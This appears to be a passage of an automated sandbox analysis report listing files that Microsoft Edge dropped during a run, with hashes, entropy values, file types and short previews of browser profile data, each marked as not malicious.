                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:aYHWkOT09X0Wb2dkNZ3vkcKmVwYwCe1xHl14oi/qXYoetn6xg1HF:nWkPMdkNZfkcKbPt14DqXYoetn6xaH
                                                                                                                                                                                                                                                                                                    MD5:52F0D53EA206FEC31FFB78B2BA609CB4
                                                                                                                                                                                                                                                                                                    SHA1:E198957CC9357B6BA4E7F074E0EB33E3B8108E3B
                                                                                                                                                                                                                                                                                                    SHA-256:2F28D936FE48059EB7FA98EE89D6F5A445BE35B0C801E1D4BA49D80A6D8A7088
                                                                                                                                                                                                                                                                                                    SHA-512:E0350FC6A9AEB22D73137B20669855866F359D9EBD6324738D55F3FBF0B09BC39D99CA8EAC926057BFBB57704789BE048183B0FA16B2BA20DAC98C777EE3E543
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................G...G..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jvfbrp20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6......
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                                                    MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                                                    SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                                                    SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                                                    SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):24853
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.565133283975249
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:W+OAYjWIJW5wPzf4jm8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPtRIgtZrrwXLpBtuk:WDJjzJWaPzfqmu1jak3zgftj
                                                                                                                                                                                                                                                                                                    MD5:87222E5DE19592B82B29F2F42B282670
                                                                                                                                                                                                                                                                                                    SHA1:A8C13C7ED3D569ADFCFBF645EC125718726C91DC
                                                                                                                                                                                                                                                                                                    SHA-256:787D7744DD26C4AD1381210FAFA28C6CC7644028AB5695C135D9D9B68DE09F0F
                                                                                                                                                                                                                                                                                                    SHA-512:70B79E198C8EB0719AFA3915761BF56B046B4C88C4E41DF534CE8515CCB383C3F3C070681A2F6149DB6F8B6D756AD5BEA6EE153063B4BAD0F34160DD1123200F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377747731435546","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377747731435546","location":5,"ma
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.561241119476848
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:W+nAWjWMh7pLGLPTJW5wPzf42m8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP64CRIgto:WG/jTXcPTJWaPzf1mu1jaX4C3kg07ry0
                                                                                                                                                                                                                                                                                                    MD5:5B2EB00FE80CE2B408A05EB1AAB45658
                                                                                                                                                                                                                                                                                                    SHA1:0C16D33A9B8FEF90AC9D24E1D53C292B8E0032A2
                                                                                                                                                                                                                                                                                                    SHA-256:BC35DC3B2EEDD600B09BF96E842D75A1CF9B02EFE3CECA9A02585CB55C77DB2A
                                                                                                                                                                                                                                                                                                    SHA-512:611899B57CAFA9A798ADDD674555826C69350A953CB82A69588C422FDE7AD599CC47E549531827A8DAD8A4538FC4E2AD2B37AA2442FB2B54F8DC9BE0A30A1AF6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377747731435546","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377747731435546","location":5,"ma
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.226709901450956
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXSQq1N723oH+Tcwtp3hBtB2KLlkXcJ39+q2PN723oH+Tcwtp3hBWsIFUv:0SQaaYebp3dFLci9+vVaYebp3eFUv
                                                                                                                                                                                                                                                                                                    MD5:A319AADFC125BA1FCA06FE303DE55669
                                                                                                                                                                                                                                                                                                    SHA1:89322DC9126A31195C6FF80C029A802AE33012E9
                                                                                                                                                                                                                                                                                                    SHA-256:957D658F62AF516FB3120A41AE2F3ABEC080D2FCA51B8498A5AF5DA351F83D7A
                                                                                                                                                                                                                                                                                                    SHA-512:756ED35899F3E454ED5F5871C9206ED89FDCEEED3E7B11F40F9134934DF23BB58856568623F94AC30C21DB7536C25EBBBCE26C8816E9A172049BAD2305261C35
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:16.449 c5c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/03-20:02:16.461 c5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                    Size (bytes):2163821
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.222886215879338
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IbPMZpVIfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVIfx2mjF
                                                                                                                                                                                                                                                                                                    MD5:D615013F54D979438D08B3CAE0A5F8B4
                                                                                                                                                                                                                                                                                                    SHA1:A17CDB65B0B3FF5FF6D6EB55887EFE5D187740D9
                                                                                                                                                                                                                                                                                                    SHA-256:63235DAF05291A0D7207A1C8D54C31EFC9C6689C0D26A22D22A646D4D9D9162D
                                                                                                                                                                                                                                                                                                    SHA-512:CCF2F265B999BFB470076639E85598FFA3246BC8DAEF93368181154BAF974D2619AF4D0D08FDA79AD184415DC4B8069A47BCE481C8E2D305F2547D6D888B6779
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):340
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.09410206729497
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXVn+q2PN723oH+Tcwt9Eh1tIFUt8vXmJdHZZmw+vXYKHNVkwON723oH+Tcwt9Er:08vVaYeb9Eh16FUt8PmJtZ/+PYa5OaYf
                                                                                                                                                                                                                                                                                                    MD5:103FA7DAB553A8068C1A8CD0516A0564
                                                                                                                                                                                                                                                                                                    SHA1:EA2BA5EF6529C0BD4310AA68F8423957FE611132
                                                                                                                                                                                                                                                                                                    SHA-256:6299BE91C0E65B955C2C827ADBA716B8B23ABE5099133E223BEA308A2E7B2F38
                                                                                                                                                                                                                                                                                                    SHA-512:6435017890B6D5C7BD0C7023A67FEF019789CC68904EFE71F2C1C34C686D08E49C2D9282EE6CE3F1276DDC92DB272B4A0760477582EADD277311C01233060B4F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:17.738 1c88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/03-20:02:17.740 1c88 Recovering log #3.2024/12/03-20:02:17.747 1c88 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):340
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.09410206729497
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXVn+q2PN723oH+Tcwt9Eh1tIFUt8vXmJdHZZmw+vXYKHNVkwON723oH+Tcwt9Er:08vVaYeb9Eh16FUt8PmJtZ/+PYa5OaYf
                                                                                                                                                                                                                                                                                                    MD5:103FA7DAB553A8068C1A8CD0516A0564
                                                                                                                                                                                                                                                                                                    SHA1:EA2BA5EF6529C0BD4310AA68F8423957FE611132
                                                                                                                                                                                                                                                                                                    SHA-256:6299BE91C0E65B955C2C827ADBA716B8B23ABE5099133E223BEA308A2E7B2F38
                                                                                                                                                                                                                                                                                                    SHA-512:6435017890B6D5C7BD0C7023A67FEF019789CC68904EFE71F2C1C34C686D08E49C2D9282EE6CE3F1276DDC92DB272B4A0760477582EADD277311C01233060B4F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:17.738 1c88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/03-20:02:17.740 1c88 Recovering log #3.2024/12/03-20:02:17.747 1c88 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46333761607227775
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5DdRd:TouQq3qh7z3bY2LNW9WMcUvBux5
                                                                                                                                                                                                                                                                                                    MD5:DF061B0EDBE54C60156E45A06AC804CD
                                                                                                                                                                                                                                                                                                    SHA1:8C280BB682027B48C8BD94E82E02DD5E9EDE8E52
                                                                                                                                                                                                                                                                                                    SHA-256:DCCA67ADFEE5DA43520CD34879BD5FB555C2040EB0B82E9FDC98AFC2119344F8
                                                                                                                                                                                                                                                                                                    SHA-512:C6659CA42A4F0F416655598165BB9A08453E05369A720EF876EE4B4640A436BE0849C726B09AA4DA713458E8131A143BEB80272A6EC57DB1BFCAD7A0270675FC
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.114267933027889
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXVR+q2PN723oH+TcwtnG2tMsIFUt8vXVNZmw+vXV8NVkwON723oH+TcwtnG2tM2:0uvVaYebn9GFUt8P3/+P6z5OaYebn95J
                                                                                                                                                                                                                                                                                                    MD5:24727FF79451C9E11E39EE971C410AFE
                                                                                                                                                                                                                                                                                                    SHA1:92D58D4D472C81EFAF6473E20A12631E4BA42FFB
                                                                                                                                                                                                                                                                                                    SHA-256:03089FA3EE5AD85A0D294BC3D1E3BA1BEC08409D246CA254CACCFA528949382E
                                                                                                                                                                                                                                                                                                    SHA-512:4F0A817B65CF86EFEFF90C4D327CF8305EDA16749DD85DB9EDDAA1403DE5300C9FD2D6E057DFCC1E1DAB0D1BA4DBF260BB172DA7DC1C63C75F0ACA7877D89E23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.603 1aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/03-20:02:11.603 1aa8 Recovering log #3.2024/12/03-20:02:11.604 1aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.114267933027889
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXVR+q2PN723oH+TcwtnG2tMsIFUt8vXVNZmw+vXV8NVkwON723oH+TcwtnG2tM2:0uvVaYebn9GFUt8P3/+P6z5OaYebn95J
                                                                                                                                                                                                                                                                                                    MD5:24727FF79451C9E11E39EE971C410AFE
                                                                                                                                                                                                                                                                                                    SHA1:92D58D4D472C81EFAF6473E20A12631E4BA42FFB
                                                                                                                                                                                                                                                                                                    SHA-256:03089FA3EE5AD85A0D294BC3D1E3BA1BEC08409D246CA254CACCFA528949382E
                                                                                                                                                                                                                                                                                                    SHA-512:4F0A817B65CF86EFEFF90C4D327CF8305EDA16749DD85DB9EDDAA1403DE5300C9FD2D6E057DFCC1E1DAB0D1BA4DBF260BB172DA7DC1C63C75F0ACA7877D89E23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.603 1aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/03-20:02:11.603 1aa8 Recovering log #3.2024/12/03-20:02:11.604 1aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6127796846688287
